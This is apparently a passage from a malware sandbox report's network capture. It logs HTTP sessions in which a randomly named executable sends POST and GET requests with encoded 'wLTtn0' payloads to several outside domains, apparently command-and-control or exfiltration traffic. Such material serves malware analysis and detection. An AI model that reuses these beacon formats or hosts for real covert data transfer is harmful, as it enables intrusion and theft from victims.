wLTtn0=95Lej2k1yGYeiyMGVpbZCre1DFRr27RmAPJzzKt+IlbJmPcIB3nO+OGpblKzo9qT2+zZrZvJDKmLyJqf77r1ViB6Km5If+8R64aqKPU2VLe3jjDk+zJGLD4c/ojPfhQZ4cmQftUXFTDME364qdC74TclDHxruRKC53yQ1XvoYzZ2kYeYUENXa88rgPW6jkKF6/MGnoj2T89By6bFteFuuSHGP61CVcnN/HmDZNQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49733	13.248.169.48	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:23.223947048 CEST	1822	OUT	POST /b7sv/ HTTP/1.1 Host: www.izen.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.izen.group Referer: http://www.izen.group/b7sv/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 39 35 4c 65 6a 32 6b 31 79 47 59 65 69 79 4d 47 56 70 62 5a 43 72 65 31 44 46 52 72 32 37 52 6d 41 50 4a 7a 7a 4b 74 2b 49 6c 54 4a 6d 61 51 49 41 51 4c 4f 34 2b 47 70 61 6c 4b 32 6f 39 71 4b 32 2b 72 64 72 5a 6a 33 44 4d 71 4c 39 4d 2b 66 39 4b 72 31 66 69 42 36 42 47 35 4a 56 65 38 41 36 34 4b 75 4b 50 45 32 56 4c 65 33 6a 6b 7a 6b 75 58 6c 47 4d 7a 34 54 6f 59 6a 44 62 68 52 2b 34 61 4f 71 66 70 49 48 46 6a 6a 4d 46 57 4b 34 6d 4f 71 37 30 54 63 72 43 48 78 7a 75 52 47 64 35 33 76 6a 31 58 32 67 59 30 31 32 6d 4a 2f 35 48 58 78 62 47 4e 59 4e 73 74 79 2f 6c 58 6d 30 34 4f 59 4d 36 72 4f 57 56 63 64 67 35 5a 43 46 6b 37 73 43 73 56 50 47 58 6f 35 52 57 38 4b 6c 71 69 71 68 48 37 34 58 67 4a 6e 33 4e 50 56 36 56 6a 4e 75 6a 56 67 78 4e 66 78 62 58 39 32 35 76 4a 78 50 6a 41 66 6b 6c 34 39 73 58 61 78 7a 30 55 6b 49 7a 34 50 33 37 63 55 71 48 61 61 47 33 74 55 42 67 41 4a 6e 62 53 67 34 72 56 5a 5a 4a 35 73 42 33 56 72 38 69 54 71 76 79 30 44 6c 36 52 54 59 47 65 44 52 6b 55 75 [TRUNCATED] Data Ascii: wLTtn0=95Lej2k1yGYeiyMGVpbZCre1DFRr27RmAPJzzKt+IlTJmaQIAQLO4+GpalK2o9qK2+rdrZj3DMqL9M+f9Kr1fiB6BG5JVe8A64KuKPE2VLe3jkzkuXlGMz4ToYjDbhR+4aOqfpIHFjjMFWK4mOq70TcrCHxzuRGd53vj1X2gY012mJ/5HXxbGNYNsty/lXm04OYM6rOWVcdg5ZCFk7sCsVPGXo5RW8KlqiqhH74XgJn3NPV6VjNujVgxNfxbX925vJxPjAfkl49sXaxz0UkIz4P37cUqHaaG3tUBgAJnbSg4rVZZJ5sB3Vr8iTqvy0Dl6RTYGeDRkUuiv/6IcS52p/Mkk6SDUMFIje9rbpV4QMo2hCm/+ERvwwqnIuEgnUHvNbzktMjzEXBSIFMq+Rqa1dJbbvXqeo27SWy+1xCJd4jfYP856E018DIlXJeMMQtSmmONbMXbBcGV0XtRMrALDamwbxvogPRMNVK784ovTbFRDNiKj5YBdw5DTERq1q+PLlfsgswzJ/73/ZofU91hbJpzJSuaElvIc7bWgkY4fcv7xC9zjfU6QZSkNV/xacAbrUo0XoGmi24E2RyB1FkGD5K1XjScBsy/1F/EEhfxgykotrttb0TjaMO3TGuCfPs+H13qq1/ISQLoqHDkgaIBnGIZNCESaXZcDjbYdSKn5yljoEdYOpTaZYMZFDU5oRpDWUloHJT1AuFsImuZCo9cduksU4gjZR7mmGdYTh0GY2qctaDUljmjaP9uVbsy3OAf51AmiBFEXlxOlLpktN8tT0Fz5RnxWyIxg7U4EvXNj7pzcJtlGB3PiCQUSML6edlq2M1eiFI4ah1evJVqDmM9c4zDdKDylq1DzScMvZxWYiU5fSmo4CVHhQwq35/XzKjk1kfJnj69yaqSLZLhoJNnzjDX+c+TXsoRWKTveYW246Kp+4BnFa8eFMm9ezG255HdRxg/Cymkwf6CREcTm+oSTHnmg1IdqxBmJHF3aK9X5evd6 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49734	13.248.169.48	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:25.765451908 CEST	534	OUT	GET /b7sv/?wLTtn0=w7j+gD0yrGg+rgg3b6bLH7LoNFIL2ZRfENl9mqI9AC3R/98OKlGHnvaLbHep/+eemtfpjPP4Y6n9+8uf6pj6QD92ZXReQewt6rCbHY9ZCpeEqDf5+CBDawRdjYLjTy83wviiXvFDQD/z&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.izen.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:58:26.231215954 CEST	419	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 06 Aug 2024 05:58:26 GMT Content-Type: text/html Content-Length: 279 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 4c 54 74 6e 30 3d 77 37 6a 2b 67 44 30 79 72 47 67 2b 72 67 67 33 62 36 62 4c 48 37 4c 6f 4e 46 49 4c 32 5a 52 66 45 4e 6c 39 6d 71 49 39 41 43 33 52 2f 39 38 4f 4b 6c 47 48 6e 76 61 4c 62 48 65 70 2f 2b 65 65 6d 74 66 70 6a 50 50 34 59 36 6e 39 2b 38 75 66 36 70 6a 36 51 44 39 32 5a 58 52 65 51 65 77 74 36 72 43 62 48 59 39 5a 43 70 65 45 71 44 66 35 2b 43 42 44 61 77 52 64 6a 59 4c 6a 54 79 38 33 77 76 69 69 58 76 46 44 51 44 2f 7a 26 4b 34 47 3d 54 68 79 34 4a 34 56 58 48 38 75 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wLTtn0=w7j+gD0yrGg+rgg3b6bLH7LoNFIL2ZRfENl9mqI9AC3R/98OKlGHnvaLbHep/+eemtfpjPP4Y6n9+8uf6pj6QD92ZXReQewt6rCbHY9ZCpeEqDf5+CBDawRdjYLjTy83wviiXvFDQD/z&K4G=Thy4J4VXH8ud"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49735	103.42.108.46	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:31.700552940 CEST	819	OUT	POST /bkj6/ HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.mtmoriacolives.store Referer: http://www.mtmoriacolives.store/bkj6/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 78 38 50 62 37 38 69 48 68 74 6a 2b 44 6f 56 51 32 30 4b 71 65 46 35 65 46 66 30 56 6c 4f 4b 50 48 66 37 59 41 4c 49 4c 36 6f 61 50 79 65 2b 79 43 78 56 72 32 75 79 46 4f 61 35 65 46 70 48 4c 52 32 4d 4f 62 48 53 38 43 4d 70 4e 57 34 33 31 76 6d 4c 50 6a 4e 44 65 33 56 69 79 33 43 6a 65 54 74 48 51 76 79 52 58 55 56 75 71 35 67 79 49 69 61 2b 30 4b 67 51 66 57 73 77 4f 54 72 51 41 42 33 42 56 4f 7a 43 4b 6c 48 42 66 32 2b 4e 43 72 64 51 55 7a 48 69 5a 33 44 2f 6d 41 79 33 6e 42 68 66 74 44 7a 59 55 57 42 4f 66 6d 65 2f 79 50 75 32 49 63 52 38 38 64 66 63 66 71 71 31 66 34 53 67 63 6b 68 44 4b 7a 45 39 39 44 69 77 56 51 51 3d 3d Data Ascii: wLTtn0=x8Pb78iHhtj+DoVQ20KqeF5eFf0VlOKPHf7YALIL6oaPye+yCxVr2uyFOa5eFpHLR2MObHS8CMpNW431vmLPjNDe3Viy3CjeTtHQvyRXUVuq5gyIia+0KgQfWswOTrQAB3BVOzCKlHBf2+NCrdQUzHiZ3D/mAy3nBhftDzYUWBOfme/yPu2IcR88dfcfqq1f4SgckhDKzE99DiwVQQ==
Aug 6, 2024 07:58:32.568193913 CEST	170	IN	HTTP/1.1 405 Method Not Allowed Content-Type: text/plain; charset=utf-8 Date: Tue, 06 Aug 2024 05:58:32 GMT Content-Length: 18 Connection: close Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49736	103.42.108.46	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:34.246884108 CEST	839	OUT	POST /bkj6/ HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.mtmoriacolives.store Referer: http://www.mtmoriacolives.store/bkj6/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 78 38 50 62 37 38 69 48 68 74 6a 2b 43 4a 6c 51 77 56 4b 71 4c 56 35 64 4b 2f 30 56 76 75 4b 4c 48 66 33 59 41 4b 4e 4f 36 62 75 50 79 2b 75 79 44 7a 74 72 7a 75 79 46 57 71 34 55 42 70 48 45 52 32 4a 74 62 47 2b 38 43 4d 74 4e 57 36 66 31 76 55 6a 49 69 64 44 6d 2f 31 69 38 35 69 6a 65 54 74 48 51 76 79 46 74 55 56 6d 71 35 51 43 49 69 37 2b 7a 57 77 51 59 54 63 77 4f 58 72 51 45 42 33 42 33 4f 78 32 77 6c 46 35 66 32 2f 39 43 6f 4d 51 62 38 48 69 66 36 6a 2b 72 4b 58 47 4f 4e 67 50 39 61 44 49 4f 57 32 61 46 6a 6f 69 51 56 4d 36 6b 43 41 45 48 5a 64 34 70 39 4d 6f 71 36 54 6b 45 70 44 33 72 73 7a 59 58 4f 77 52 52 47 6b 4a 71 37 49 65 51 74 50 48 35 47 54 57 64 76 45 6b 57 30 54 77 3d Data Ascii: wLTtn0=x8Pb78iHhtj+CJlQwVKqLV5dK/0VvuKLHf3YAKNO6buPy+uyDztrzuyFWq4UBpHER2JtbG+8CMtNW6f1vUjIidDm/1i85ijeTtHQvyFtUVmq5QCIi7+zWwQYTcwOXrQEB3B3Ox2wlF5f2/9CoMQb8Hif6j+rKXGONgP9aDIOW2aFjoiQVM6kCAEHZd4p9Moq6TkEpD3rszYXOwRRGkJq7IeQtPH5GTWdvEkW0Tw=
Aug 6, 2024 07:58:35.113583088 CEST	170	IN	HTTP/1.1 405 Method Not Allowed Content-Type: text/plain; charset=utf-8 Date: Tue, 06 Aug 2024 05:58:34 GMT Content-Length: 18 Connection: close Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49737	103.42.108.46	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:36.793736935 CEST	1852	OUT	POST /bkj6/ HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.mtmoriacolives.store Referer: http://www.mtmoriacolives.store/bkj6/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 78 38 50 62 37 38 69 48 68 74 6a 2b 43 4a 6c 51 77 56 4b 71 4c 56 35 64 4b 2f 30 56 76 75 4b 4c 48 66 33 59 41 4b 4e 4f 36 62 32 50 7a 49 69 79 43 55 42 72 77 75 79 46 49 61 34 58 42 70 48 64 52 32 78 78 62 47 69 4b 43 4f 6c 4e 58 62 2f 31 6d 46 6a 49 74 64 44 6d 7a 56 69 39 33 43 6a 58 54 74 58 63 76 79 56 74 55 56 6d 71 35 53 61 49 79 36 2b 7a 47 41 51 66 57 73 77 4b 54 72 51 38 42 33 5a 4e 4f 78 6a 50 6c 31 5a 66 33 66 74 43 71 2b 34 62 6a 33 69 64 39 6a 2f 34 4b 58 43 56 4e 6b 76 4c 61 43 4d 6f 57 78 32 46 67 75 50 31 4a 63 4f 6c 51 7a 63 73 66 37 67 4b 79 76 41 4f 31 6a 59 48 6d 30 4c 30 71 30 55 74 46 54 78 4c 43 7a 59 4c 36 4c 6d 35 6b 4f 72 41 4e 6e 33 33 77 6c 45 75 32 46 4d 66 7a 67 4a 32 44 76 48 65 37 34 6a 6d 63 4c 6c 36 65 46 54 37 50 42 62 32 6d 6b 77 33 6c 42 44 41 32 31 48 59 4c 6f 79 31 78 78 54 48 65 59 35 48 68 4d 6c 30 30 68 34 4f 6d 79 76 66 36 37 6b 75 72 6d 38 34 62 2f 6b 53 67 72 62 6f 35 57 4f 45 52 45 66 36 47 5a 56 4e 2f 4f 4b 74 43 48 51 2f 77 4e 66 [TRUNCATED] Data Ascii: wLTtn0=x8Pb78iHhtj+CJlQwVKqLV5dK/0VvuKLHf3YAKNO6b2PzIiyCUBrwuyFIa4XBpHdR2xxbGiKCOlNXb/1mFjItdDmzVi93CjXTtXcvyVtUVmq5SaIy6+zGAQfWswKTrQ8B3ZNOxjPl1Zf3ftCq+4bj3id9j/4KXCVNkvLaCMoWx2FguP1JcOlQzcsf7gKyvAO1jYHm0L0q0UtFTxLCzYL6Lm5kOrANn33wlEu2FMfzgJ2DvHe74jmcLl6eFT7PBb2mkw3lBDA21HYLoy1xxTHeY5HhMl00h4Omyvf67kurm84b/kSgrbo5WOEREf6GZVN/OKtCHQ/wNfkA77XfMSAOrVhBN7QDx1jdAAkXoCJuTMnOdUWKQ6bk0FyubmZMI7CO/s5cHWSDIQgjO0b5SiyWEd4iEIE03OpMhSebGqlMTVVZgvYGoan+wVZHQ2O2uw998G3nDKkNNA1VXjEqdnYJg53PWmg4yGl7ZlJOXRYukhPoUHcsj9aInGxglVA9Ue178bcMtBjfSfeKp3PggpTlnWPA54x3H/W42OJ3X878WLZKl00KpVXv4VLo7Bk1KQXgwQfFiNpSBzhGE66wjwAJVzqL1nHokFn2LpLUqwe9vRBO9gvILg/Dz9/0YFglQJTB7+7vqiEKT1lHE207xPGWzMWOzG7EOuYyzKTCaOJrMG1/C+VZ6gTPtPWcyH3QsFPq3pUmFC1EjEh2uDesX/xAp2721xp9ePU8eT27R38WYe2cqA1ADLvWBeMPpDs52RgtuBRO8stPI6+j43gJqgL5yU4/9CoQqFrorK2LZNeNAa0e5Yj4qjrWAFFVIYx8wa+4ndUiYUwzDlhNVURIFTuJHCSdyaQhAgAHfkrjmbtvyA8MVfD/zQsDgT19NxC3tyyskH/UXayjhXBStBqZyBOaj1TrBhasPGBV79TGhMX1kbkZ88Al1OORXYiUKfzbGSrkBpXQ37u/mj7PVfVYn7foYLV/T5OLSiJh1HyGpNkzAViP [TRUNCATED]
Aug 6, 2024 07:58:37.683037996 CEST	170	IN	HTTP/1.1 405 Method Not Allowed Content-Type: text/plain; charset=utf-8 Date: Tue, 06 Aug 2024 05:58:37 GMT Content-Length: 18 Connection: close Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49738	103.42.108.46	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:39.336551905 CEST	544	OUT	GET /bkj6/?wLTtn0=8+n74ICH5t2dNKQX6lGuEwogKdFcm+efCN+AaJVQ/oTJ/vS0JBNmwd2cButyC47RBhZlYQKvXK9jQKf8mEf8lv7WjUOFxC32M8Dim1Z9UGO50WC+y5zJBQxNdJ1dbpIzCXRAAg7Lwi8E&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:58:40.329940081 CEST	1236	IN	HTTP/1.1 200 OK Cache-Control: no-cache, private Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Aug 2024 05:58:40 GMT Connection: close Transfer-Encoding: chunked Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 41 55 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 74 72 61 69 70 2e 63 6f 6d 2e 61 75 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 79 6e 65 72 67 79 77 68 6f 6c 65 73 61 6c 65 2e 63 6f 6d 2f 6d 61 6e 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 35 36 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 44 72 6f 69 64 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e [TRUNCATED] Data Ascii: 8000<!DOCTYPE html> <html lang=en-AU><head><link rel="icon" type="image/x-icon" href="https://ventraip.com.au/favicon.ico"><link rel="stylesheet" href="//static.synergywholesale.com/manage/style.css?v=563" type="text/css"><link href="//fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet" type="text/css"><script type="text/javascript" src="/inc/js/components/jquery-3.5.1.min.js"></script><script type="text/javascript" src="/inc/js/components/client.js"></script><link rel="stylesheet" href="/inc/js/components/Aristo.css" type="text/css" /><script type="text/javascript" src="/inc/js/components/jquery-ui.min.js?v=2"></script><link rel="stylesheet" href="/inc/js/components/fancybox.min.css" type="text/css" /><link rel="stylesheet" href="/inc/style/scss/timepicker.css"><link rel="stylesheet" href="/inc/js/components/chosen.css"><script type="text/javascript" src="/inc/js/components/polyfill.min.js"></script><script type="text/jav [TRUNCATED]
Aug 6, 2024 07:58:40.329972982 CEST	1236	IN	Data Raw: 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 69 6e 63 2f 6a 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 66 61 6e 63 79 62 6f 78 2e 6d Data Ascii: js"></script><script type="text/javascript" src="/inc/js/components/fancybox.min.js"></script><script type="text/javascript" src="/inc/js/components/sweetalert2.min.js"></script><script type="text/javascript" src="/inc/js/component
Aug 6, 2024 07:58:40.329979897 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: width: 100%; display: flex; justify-content: center; max-width: 95vw; } td input, td select { width: 100%;
Aug 6, 2024 07:58:40.329992056 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f Data Ascii: rtant; line-height: normal; margin: auto; } } p { opacity: 1 !important; } #cor > div {
Aug 6, 2024 07:58:40.329998970 CEST	1236	IN	Data Raw: 20 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 34 70 78 20 33 32 70 78 20 2d 34 70 78 20 72 67 62 61 28 32 35 2c 32 38 2c 31 30 34 2c 2e 31 38 29 Data Ascii: #fff !important; box-shadow: 0 4px 32px -4px rgba(25,28,104,.18); overflow: hidden; border-radius: 12px; margin: 16px auto; } .template-center a {
Aug 6, 2024 07:58:40.330008984 CEST	1236	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 69 64 65 6e 74 69 74 79 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 20 3e 20 68 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 Data Ascii: ; } #identity-verification > hr { max-width: clamp(300px, 540px, 80%); } #identity-verification > hr + div { max-width: 560px; margin: 0 aut
Aug 6, 2024 07:58:40.330015898 CEST	1236	IN	Data Raw: 2d 64 6f 63 75 6d 65 6e 74 2d 66 6f 72 6d 20 2e 69 64 65 6e 74 69 74 79 2d 64 6f 63 75 6d 65 6e 74 2d 66 6f 72 6d 5f 5f 74 69 74 6c 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 Data Ascii: -document-form .identity-document-form__title { width: 100%; } #verify-form .identity-document-form .form-group { flex-wrap: wrap; } .submission-section {
Aug 6, 2024 07:58:40.330024004 CEST	1000	IN	Data Raw: 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 7b 68 74 6d 6c 3a 68 61 73 28 5b Data Ascii: scroll-behavior:auto!important}@media only screen and (max-width:991px){html:has([class=floatingNavigation]){scroll-padding-top:128px}}a{color:#3766b2;text-decoration:none}{box-sizing:border-box}h1{margin:0;font-weight:600}@supports (-webkit
Aug 6, 2024 07:58:40.330030918 CEST	1236	IN	Data Raw: 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 70 7b 66 6f 6e 74 2d 73 69 7a Data Ascii: nt-size:16px;line-height:24px}@media only screen and (max-width:1200px){p{font-size:14px;line-height:20px}}.body1{font-size:16px;line-height:24px}@media only screen and (max-width:1200px){.body1{font-size:16px;line-height:20px}}.body2{font-siz
Aug 6, 2024 07:58:40.330039024 CEST	1236	IN	Data Raw: 74 78 74 2d 46 46 46 46 46 46 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 62 67 64 2d 30 32 2e 64 69 73 61 62 6c 65 64 3a 62 65 66 6f 72 65 2c 2e 62 67 64 2d 30 32 3a 64 69 73 61 62 6c 65 64 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 62 Data Ascii: txt-FFFFFF{color:#fff}.bgd-02.disabled:before,.bgd-02:disabled:before{opacity:1}.bs-2:after{position:absolute;top:0;left:0;width:calc(100% - 4px);height:calc(100% - 4px);border-width:2px;border-style:solid;border-radius:inherit;content:""}.b-2
Aug 6, 2024 07:58:40.335074902 CEST	1236	IN	Data Raw: 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 41 6c 70 68 61 28 4f 70 61 63 69 74 79 3d 24 70 61 72 61 6d 29 22 3b 66 69 6c 74 65 72 3a 22 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 24 70 61 72 61 6d 29 22 3b 2d 6d 6f 7a 2d 6f 70 61 63 69 74 79 3a 31 3b 2d Data Ascii: m.Microsoft.Alpha(Opacity=$param)";filter:"alpha(opacity=$param)";-moz-opacity:1;-khtml-opacity:1;opacity:1}to{-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=$param)";filter:"alpha(opacity=$param)";-moz-opacity:.5;-khtml-opacity:.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49739	203.161.46.201	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:46.989451885 CEST	789	OUT	POST /vqrt/ HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.zippio.top Referer: http://www.zippio.top/vqrt/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 4f 39 71 67 6f 4b 54 2b 37 52 41 53 4e 2b 51 79 78 67 38 2b 76 4f 70 59 6f 6c 6f 63 48 6a 31 4f 6d 50 6e 72 6e 6a 2b 4a 59 70 71 4e 6d 50 41 5a 4a 31 52 4e 66 75 39 57 38 52 34 44 53 37 68 35 6d 33 30 36 6d 5a 73 54 4d 69 53 6a 47 46 33 6e 